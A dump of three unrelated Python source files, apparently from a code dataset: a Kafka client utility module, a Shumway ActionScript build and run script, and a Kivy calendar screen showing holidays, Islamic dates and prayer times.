from kafka.errors import BufferUnderflowError
def crc32(data):
crc = binascii.crc32(data)
# py2 and py3 behave a little differently
# CRC is encoded as a signed int in kafka protocol
# so we'll convert the py3 unsigned result to signed
if six.PY3 and crc >= 2**31:
crc -= 2**32
return crc
def write_int_string(s):
if s is not None and not isinstance(s, six.binary_type):
raise TypeError('Expected "%s" to be bytes\n'
'data=%s' % (type(s), repr(s)))
if s is None:
return struct.pack('>i', -1)
else:
return struct.pack('>i%ds' % len(s), len(s), s)
def read_short_string(data, cur):
if len(data) < cur + 2:
raise BufferUnderflowError("Not enough data left")
(strlen,) = struct.unpack('>h', data[cur:cur + 2])
if strlen == -1:
return None, cur + 2
cur += 2
if len(data) < cur + strlen:
raise BufferUnderflowError("Not enough data left")
out = data[cur:cur + strlen]
return out, cur + strlen
def relative_unpack(fmt, data, cur):
size = struct.calcsize(fmt)
if len(data) < cur + size:
raise BufferUnderflowError("Not enough data left")
out = struct.unpack(fmt, data[cur:cur + size])
return out, cur + size
def group_by_topic_and_partition(tuples):
out = collections.defaultdict(dict)
for t in tuples:
assert t.topic not in out or t.partition not in out[t.topic], \
'Duplicate {0}s for {1} {2}'.format(t.__class__.__name__,
t.topic, t.partition)
out[t.topic][t.partition] = t
return out
class ReentrantTimer(object):
"""
A timer that can be restarted, unlike threading.Timer
(although this uses threading.Timer)
Arguments:
t: timer interval in milliseconds
fn: a callable to invoke
args: tuple of args to be passed to function
kwargs: keyword arguments to be passed to function
"""
def __init__(self, t, fn, *args, **kwargs):
if t <= 0:
raise ValueError('Invalid timeout value')
if not callable(fn):
raise ValueError('fn must be callable')
self.thread = None
self.t = t / 1000.0
self.fn = fn
self.args = args
self.kwargs = kwargs
self.active = None
def _timer(self, active):
# python2.6 Event.wait() always returns None
# python2.7 and greater returns the flag value (true/false)
# we want the flag value, so add an 'or' here for python2.6
# this is redundant for later python versions (FLAG OR FLAG == FLAG)
while not (active.wait(self.t) or active.is_set()):
self.fn(*self.args, **self.kwargs)
def start(self):
if self.thread is not None:
self.stop()
self.active = Event()
self.thread = Thread(target=self._timer, args=(self.active,))
self.thread.daemon = True # So the app exits when main thread exits
self.thread.start()
def stop(self):
if self.thread is None:
return
self.active.set()
self.thread.join(self.t + 1)
# noinspection PyAttributeOutsideInit
self.timer = None
self.fn = None
def __del__(self):
self.stop()
class WeakMethod(object):
"""
Callable that weakly references a method and the object it is bound to. It
is based on http://stackoverflow.com/a/24287465.
Arguments:
object_dot_method: A bound instance method (i.e. 'object.method').
"""
def __init__(self, object_dot_method):
try:
self.target = weakref.ref(object_dot_method.__self__)
except AttributeError:
self.target = weakref.ref(object_dot_method.im_self)
self._target_id = id(self.target())
try:
self.method = weakref.ref(object_dot_method.__func__)
except AttributeError:
self.method = weakref.ref(object_dot_method.im_func)
self._method_id = id(self.method())
def __call__(self, *args, **kwargs):
"""
Calls the method on target with args and kwargs.
"""
return self.method()(self.target(), *args, **kwargs)
def __hash__(self):
return hash(self.target) ^ hash(self.method)
def __eq__(self, other):
if not isinstance(other, WeakMethod):
return False
return self._target_id == other._target_id and self._method_id == other._method_id
def try_method_on_system_exit(obj, method, *args, **kwargs):
def wrapper(_obj, _meth, *args, **kwargs):
try:
getattr(_obj, _meth)(*args, **kwargs)
except (ReferenceError, AttributeError):
pass
atexit.register(wrapper, weakref.proxy(obj), method, *args, **kwargs)
|
shu.py
|
#!/usr/bin/env python
import argparse
import multiprocessing
import os.path
import os
import Queue
import signal
import subprocess
import sys
import time
import threading
import base64
from subprocess import Popen, PIPE, STDOUT
from collections import Counter
def readLines(file):
lines = []
for line in open(file, 'r').read().split('\n'):
if line != "":
lines.append(line)
return lines
def execute (command, timeout = -1):
start_time = time.time()
processPid = [None]
stdoutOutput = [None]
stderrOutput = [None]
def target():
process = Popen(command, stdout=PIPE, stderr=STDOUT, close_fds=True)
processPid[0] = process.pid;
(stdoutOutput[0], stderrOutput[0]) = process.communicate();
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
# Kill Process
try:
os.killpg(processPid[0], signal.SIGKILL)
except:
pass
os.waitpid(-1, os.WNOHANG)
thread.join()
elapsed_time = time.time() - start_time
output = stdoutOutput[0]
return (output.strip(), elapsed_time);
def execute2(cmd, timeout=None):
'''
Will execute a command, read the output and return it back.
@param cmd: command to execute
@param timeout: process timeout in seconds
@return: a tuple of three: first stdout, then stderr, then exit code
@raise OSError: on missing command or if a timeout was reached
'''
ph_out = None # process output
ph_err = None # stderr
ph_ret = None # return code
start_time = time.time()
def preexec_function():
# Ignore the SIGINT signal by setting the handler to the standard
# signal handler SIG_IGN.
signal.signal(signal.SIGINT, signal.SIG_IGN)
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=True,
preexec_fn = preexec_function)
# if timeout is not set wait for process to complete
if not timeout:
ph_ret = p.wait()
else:
fin_time = time.time() + timeout
while p.poll() == None and fin_time > time.time():
time.sleep(0.001)
# if timeout reached, raise an exception
if fin_time < time.time():
# starting 2.6 subprocess has a kill() method which is preferable
# p.kill()
try:
os.kill(p.pid, signal.SIGKILL)
except:
pass
return None
ph_ret = p.returncode
ph_out, ph_err = p.communicate()
return (ph_out, time.time() - start_time)
class Base:
asc = None
avm = None
builtin_abc = None
def __init__(self):
self.setEnvironmentVariables();
pass
def setEnvironmentVariables(self):
if 'ASC' in os.environ:
self.asc = os.environ['ASC'].strip();
else:
print "Environment variable ASC is not defined, set it to asc.jar"
if 'BUILTINABC' in os.environ:
self.builtin_abc = os.environ['BUILTINABC'].strip();
else:
print "Environment variable BUILTINABC is not defined, set it to builtin.abc"
if 'SHELLABC' in os.environ:
self.shell_abc = os.environ['SHELLABC'].strip();
else:
print "Environment variable SHELLABC is not defined, set it to shell.abc"
# The builtin.abc cannot be combined with the playerglobal.abc file that comes with Alchemy, thus we need
# this other global.abc library.
if 'GLOBALABC' in os.environ:
self.global_abc = os.environ['GLOBALABC'].strip();
if 'PLAYERGLOBALABC' in os.environ:
self.player_global_abc = os.environ['PLAYERGLOBALABC'].strip();
if 'AVM' in os.environ:
self.avm = os.environ['AVM']
else:
print "Environment variable AVM is not defined, set it to avmshell"
if not self.asc:
sys.exit();
def runAsc(self, files, createSwf = False, builtin = False, shell = False, _global = False, playerGlobal = False, sc = False):
if sc:
outf = os.path.splitext(files[-1])[0]
args = ["java", "-ea", "-DAS3", "-DAVMPLUS", "-classpath", self.asc,
"macromedia.asc.embedding.ScriptCompiler", "-d", "-md", "-out", outf]
else:
args = ["java", "-ea", "-DAS3", "-DAVMPLUS", "-jar", self.asc, "-d", "-md"]
if createSwf:
args.extend(["-swf", "cls,1,1"])
if builtin:
args.extend(["-import", self.builtin_abc])
if shell:
args.extend(["-import", self.shell_abc])
if _global:
args.extend(["-import", self.global_abc])
if playerGlobal:
playerGlobalAbcs = []
if not os.path.isdir(self.player_global_abc):
playerGlobalAbcs.append(self.player_global_abc)
else:
for root, subFolders, abcFiles in os.walk(self.player_global_abc):
for file in abcFiles:
if file.endswith(".abc"):
playerGlobalAbcs.append(os.path.join(root, file))
for abc in playerGlobalAbcs:
args.extend(["-import", abc])
args.extend(files);
subprocess.call(args)
if sc:
os.remove(outf + ".cpp")
os.remove(outf + ".h")
def runAvm(self, file, execute = True, trace = False, disassemble = False):
args = ["js", "-m", "-n", "avm.js"];
if disassemble:
args.append("-d")
if execute:
args.append("-x")
args.append(file)
subprocess.call(args)
class Command(Base):
name = ""
def __init__(self, name):
Base.__init__(self)
self.name = name
class Asc(Command):
def __init__(self):
Command.__init__(self, "asc")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Compiles an ActionScript source file to .abc or .swf using the asc.jar compiler.')
parser.add_argument('src', nargs='+', help="source .as file")
parser.add_argument('-builtin', action='store_true', help='import builtin.abc')
parser.add_argument('-shell', action='store_true', help='import shell.abc')
parser.add_argument('-globals', action='store_true', help='import global.abc')
parser.add_argument('-playerGlobal', action='store_true', help='import playerGlobal.abc')
parser.add_argument('-sc', action='store_true', help='use embedding.ScriptCompiler (needed to compile multiple scripts into one .abc file)')
parser.add_argument('-swf', action='store_true', help='optionally package compiled file in a .swf file')
args = parser.parse_args(args)
print "Compiling %s" % args.src
self.runAsc(args.src, args.swf, builtin = args.builtin, shell = args.shell, _global = args.globals, playerGlobal = args.playerGlobal, sc = args.sc)
class Reg(Command):
def __init__(self):
Command.__init__(self, "reg")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Compiles all the source files in the test/regress directory using the asc.jar compiler.')
parser.add_argument('src', nargs="?", default="../tests/regress", help="source .as file")
parser.add_argument('-force', action='store_true', help="force recompilation of all regression tests")
args = parser.parse_args(args)
print "Compiling Regression Tests"
tests = [];
if os.path.isdir(args.src):
for root, subFolders, files in os.walk(args.src):
for file in files:
if file.endswith(".as") and file != "harness.as":
asFile = os.path.join(root, file)
abcFile = os.path.splitext(asFile)[0] + ".abc"
compile = args.force
if not os.path.exists(abcFile):
compile = True
elif os.path.getmtime(abcFile) < os.path.getmtime(asFile):
compile = True
if compile:
tests.append(asFile)
else:
tests.append(os.path.abspath(args.src))
for test in tests:
args = ["java", "-jar", self.asc, "-d", "-md", "-import", self.builtin_abc, "-in", "../tests/regress/harness.as", test]
subprocess.call(args)
class BuildTests(Command):
def __init__(self):
Command.__init__(self, "build-tests")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Compiles all the source files in the test/ directory using the asc.jar compiler.')
parser.add_argument('-force', action='store_true', help="force recompilation of all tests")
args = parser.parse_args(args)
Reg().execute([])
print "Compiling Tests"
tests = [];
# Skip the regress and tamarin directories
testDirectories = set(os.walk('../tests').next()[1]) - set(["regress", "tamarin"])
for dir in testDirectories:
for root, subFolders, files in os.walk("../tests/" + dir):
for file in files:
if file.endswith(".as"):
asFile = os.path.join(root, file)
abcFile = os.path.splitext(asFile)[0] + ".abc"
compile = args.force
if not os.path.exists(abcFile):
compile = True
elif os.path.getmtime(abcFile) < os.path.getmtime(asFile):
compile = True
if compile:
tests.append(asFile)
for test in tests:
args = ["java", "-jar", self.asc, "-d", "-md", "-import", self.builtin_abc, test]
print "Compiling " + test
subprocess.call(args)
return
class Avm(Command):
def __init__(self):
Command.__init__(self, "avm")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Runs an .abc file using Shumway AVM')
parser.add_argument('src', help="source .abc file")
parser.add_argument('-trace', action='store_true', help="trace bytecode execution")
args = parser.parse_args(args)
print "Running %s" % args.src
self.runAvm(args.src, trace = args.trace)
class Dis(Command):
def __init__(self):
Command.__init__(self, "dis")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Disassembles an .abc file ')
parser.add_argument('src', help="source .abc file")
args = parser.parse_args(args)
print "Disassembling %s" % args.src
self.runAvm(args.src, execute = False, disassemble = True)
# Splits a text file with the following delimiters into multiple files.
# <<< type fileName-0
# ...
# >>>
# <<< type fileName-1
# ...
# >>>
class Split(Command):
def __init__(self):
Command.__init__(self, "split")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Splits a delimited text file into multiple text files.')
parser.add_argument('src', help="source .txt file")
parser.add_argument('dst', help="destination directory")
args = parser.parse_args(args)
if not os.path.isdir(args.dst):
print "Destination \"" + args.dst + "\" is not a directory."
sys.exit();
src = args.src
dst = os.path.abspath(args.dst)
print "Splitting %s into %s" % (src, dst)
file = None
for line in readLines(src):
if line.startswith("<<< "):
tokens = line.split(" ")
type = tokens[1]
name = tokens[2]
print "Open " + dst + "/" + name
pathName = os.path.dirname(dst + "/" + name)
print "Path " + pathName
if not os.path.exists(pathName):
os.makedirs(pathName)
file = open(dst + "/" + name, "w")
elif line == ">>>":
file.close()
file = None
else:
if file:
if type == "BASE64":
file.write(base64.b64decode(line))
else:
file.write(line + "\n")
class Compile(Command):
def __init__(self):
Command.__init__(self, "compile")
def __repr__(self):
return self.name
def execute(self, args):
parser = argparse.ArgumentParser(description='Compiles an .abc file to .js ')
parser.add_argument('src', help="source .abc file")
parser.add_argument('-trace', action='store_true', help="trace bytecode execution")
args = parser.parse_args(args)
print "Compiling %s" % args.src
self.runAvm(args.src, trace = args.trace, execute = True)
commands = {}
for command in [Asc(), Avm(), Dis(), Compile(), Reg(), BuildTests(), Split()]:
commands[str(command)] = command;
parser = argparse.ArgumentParser()
parser.add_argument('command', help=",".join(commands.keys()))
args = parser.parse_args(sys.argv[1:2])
if (not args.command in commands):
print "Invalid command: %s" % args.command
parser.print_help()
command = commands[args.command];
command.execute(sys.argv[2:])
|
EventDialog.py
|
from kivy.core.window import Window
from kivy.properties import StringProperty, NumericProperty
from kivy.uix.scrollview import ScrollView
from kivymd.app import MDApp
from kivy.lang import Builder
from kivymd.uix.button import MDFlatButton
from kivymd.uix.screen import MDScreen
from kivymd.uix.list import OneLineListItem, TwoLineListItem, MDList
from kivymd.uix.snackbar import BaseSnackbar
from kivymd.uix.tab import MDTabsBase, MDTabs
from kivymd.uix.floatlayout import MDFloatLayout
from kivymd.uix.dialog import MDDialog
from kivymd.uix.textfield import MDTextField
from kivy.uix.screenmanager import ScreenManager, Screen
from kivymd.uix.boxlayout import MDBoxLayout
from kivymd.uix.label import MDLabel
from lib.drivers.holidays import Holidays
from lib.drivers.islamic import driver
from lib.drivers.personal import getPersonal
from lib.drivers.getdatelist import getDict, getstrftime
from hijri_converter import convert
from kivy.metrics import dp
from datetime import datetime
import json
import requests
import threading
APIKEY = 'Top Secret'
kv = """
<WorldEvents>:
BoxLayout:
orientation: 'vertical'
Widget:
size_hint_y: .02
MDLabel:
text: "World Events:"
padding_x: 15
size_hint_y: .1
pos_hint: {"center_y": .5}
theme_text_color: "Custom"
text_color: app.theme_cls.primary_color
ScrollView:
MDList:
id: wrv
<PersonalEvents>:
BoxLayout:
orientation: 'vertical'
MDLabel:
text: "Personal Events:"
padding_x: 15
size_hint_y: .1
pos_hint: {"center_y": .5}
theme_text_color: "Custom"
text_color: app.theme_cls.primary_color
ScrollView:
MDList:
id: prv
<Tabs>:
background_color: 0, 0, 0, 0
size_hint_y: .25
text_color_normal: app.theme_cls.primary_color
text_color_active: app.theme_cls.primary_color
underline_color: app.theme_cls.primary_color
<Tab>:
text_color_normal: app.theme_cls.primary_color
<ErrorSnackbar>:
MDIconButton:
pos_hint: {'center_y': .5}
icon: root.icon
opposite_colors: True
MDLabel:
id: text_bar
size_hint_y: None
height: self.texture_size[1]
text: root.text
font_size: root.font_size
theme_text_color: 'Custom'
text_color: get_color_from_hex('ffffff')
shorten: True
shorten_from: 'right'
pos_hint: {'center_y': .5}
"""
class ErrorSnackbar(BaseSnackbar):
text = StringProperty(None)
icon = StringProperty(None)
font_size = NumericProperty("15sp")
class Tabs(MDTabs):
pass
class Tab(MDFloatLayout, MDTabsBase):
pass
class WorldEvents(MDScreen):
pass
class PersonalEvents(MDScreen):
pass
class EventItem(OneLineListItem):
description = StringProperty()
def on_release(self):
dialog = MDDialog(
title=self.text,
text=str(self.description)
)
dialog.open()
class EventContent(MDScreen):
def build(self):
return Builder.load_string(kv)
def create(self, year, month, day):
self.build()
country = driver().getCity()['countryCode']
iso = datetime(int(year), int(month), int(day))
key = getstrftime('%A, %B {S}, %Y', iso)
islamic_date = getDict()[key].split(',')[1].strip()
hijri = convert.Gregorian(year, month, day).to_hijri().datetuple()
hijri_iso = f"{hijri[2]}-{hijri[1]}"
islamic = []
self.label = MDLabel()
self.label.size_hint_y = .05
self.label.font_size = "35px"
self.label.halign = "center"
self.label.text = islamic_date
tabs = Tabs()
tabs.on_tab_switch = self.on_tab_switch
events = Screen(name='events')
namaz = Screen(name='namaz')
personal_events = getPersonal(str(iso).split()[0])
layout = MDBoxLayout(orientation='vertical')
eventslayout = MDBoxLayout(orientation='vertical')
self.sm = ScreenManager()
events.add_widget(eventslayout)
self.sm.add_widget(events)
self.sm.add_widget(namaz)
tabs.add_widget(Tab(text="Events"))
tabs.add_widget(Tab(text="Namaz Times"))
personalscreen = PersonalEvents()
world = WorldEvents()
scroll = ScrollView()
self.nrv = MDList()
self.wrv = world.ids.wrv
self.prv = personalscreen.ids.prv
self.holidays = json.loads(requests.get(
f'https://calendarific.com/api/v2/holidays?&api_key={APIKEY}&country={country}&year={year}').text)
self.holidays['year'] = year
with open('./lib/data/islamic.json', 'r', encoding="utf-8") as file:
data = json.loads(str(file.read()))
for key in data.keys():
if key == hijri_iso:
islamic.append(data[key]["event"])
holidays = (Holidays().getHoliday(day, month, year, self.holidays))
self.wrv.add_widget(OneLineListItem(text="No Events"))
self.prv.add_widget(OneLineListItem(text="No Events"))
if holidays or islamic:
self.wrv.clear_widgets()
for i in holidays + islamic:
text = str(i)
description = None
if type(i) == dict:
text = str(i['name'])
description = str(i['description'])
item = EventItem(text=str(text), description=str(description))
self.wrv.add_widget(item)
if personal_events:
self.prv.clear_widgets()
for x in personal_events:
item = OneLineListItem(text=str(x))
self.prv.add_widget(item)
self.namaz_times = driver().getSalaatTimesForDate(iso)
for item in self.namaz_times.keys():
self.nrv.add_widget(
TwoLineListItem(text=str(item), secondary_text=str(self.namaz_times[item]), height=dp(50)))
scroll.add_widget(self.nrv)
layout.add_widget(self.label)
layout.add_widget(tabs)
layout.add_widget(self.sm)
eventslayout.add_widget(world)
eventslayout.add_widget(personalscreen)
namaz.add_widget(scroll)
self.sm.current = "events"
self.add_widget(layout)
return self
def switch_year(self, year):
thread = threading.Thread(target=self.setHoliday, args=(year,))
thread.start()
return self.holidays
def setHoliday(self, year):
country = driver().getCity()['countryCode']
self.holidays = json.loads(requests.get(
f'https://calendarific.com/api/v2/holidays?&api_key={APIKEY}&country={country}&year={year}').text)
def switch_dates(self, year, month, day):
iso = datetime(int(year), int(month), int(day))
key = getstrftime('%A, %B {S}, %Y', iso)
islamic_date = getDict()[key].split(',')[1].strip()
self.label.text = islamic_date
thread = threading.Thread(target=self.setNamaz, args=(iso,))
thread.start()
hijri = convert.Gregorian(year, month, day).to_hijri().datetuple()
hijri_iso = f"{hijri[2]}-{hijri[1]}"
islamic = []
personal_events = getPersonal(str(iso).split()[0])
with open('./lib/data/islamic.json', 'r', encoding="utf-8") as file:
data = json.loads(str(file.read()))
for key in data.keys():
if key == hijri_iso:
islamic.append(data[key]["event"])
self.wrv.clear_widgets()
self.prv.clear_widgets()
holidays = (Holidays().getHoliday(day, month, year, self.holidays))
self.wrv.add_widget(OneLineListItem(text="No Events"))
self.prv.add_widget(OneLineListItem(text="No Events"))
if holidays or islamic:
self.wrv.clear_widgets()
for i in holidays + islamic:
text = str(i)
description = None
if type(i) == dict:
text = str(i['name'])
description = str(i['description'])
item = EventItem(text=str(text), description=str(description))
self.wrv.add_widget(item)
if personal_events:
self.prv.clear_widgets()
for x in personal_events:
item = OneLineListItem(text=str(x))
self.prv.add_widget(item)
def on_tab_switch(self, *args):
if args[2] == "Events":
self.sm.transition.direction = 'right'
self.sm.current = "events"
elif args[2] == "Namaz Times":
self.sm.transition.direction = 'left'
self.sm.current = "namaz"
def setNamaz(self, iso):
self.namaz_times = driver().getSalaatTimesForDate(str(iso).split()[0])
self.nrv.clear_widgets()
for item in self.namaz_times.keys():
self.nrv.add_widget(TwoLineListItem(text=str(item), secondary_text=str(self.namaz_times[item]), height=dp(60)))
class test(MDApp):
def build(self):
self.content = EventContent(size_hint_y=None, height=400).create(2021, 4, 29)
self.layout = MDBoxLayout(orientation='vertical')
self.textfield = MDTextField(hint_text="Type Here")
self.button = MDFlatButton(text="Change Date", on_release=self.changedate)
self.layout.add_widget(self.textfield)
self.layout.add_widget(self.button)
self.layout.add_widget(self.content)
return self.layout
def changedate(self, instance):
text = self.textfield.text.split('|')
self.content.switch_dates(int(text[0]), int(text[1]), int(text[2]))
if __name__ == '__main__':
test().run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.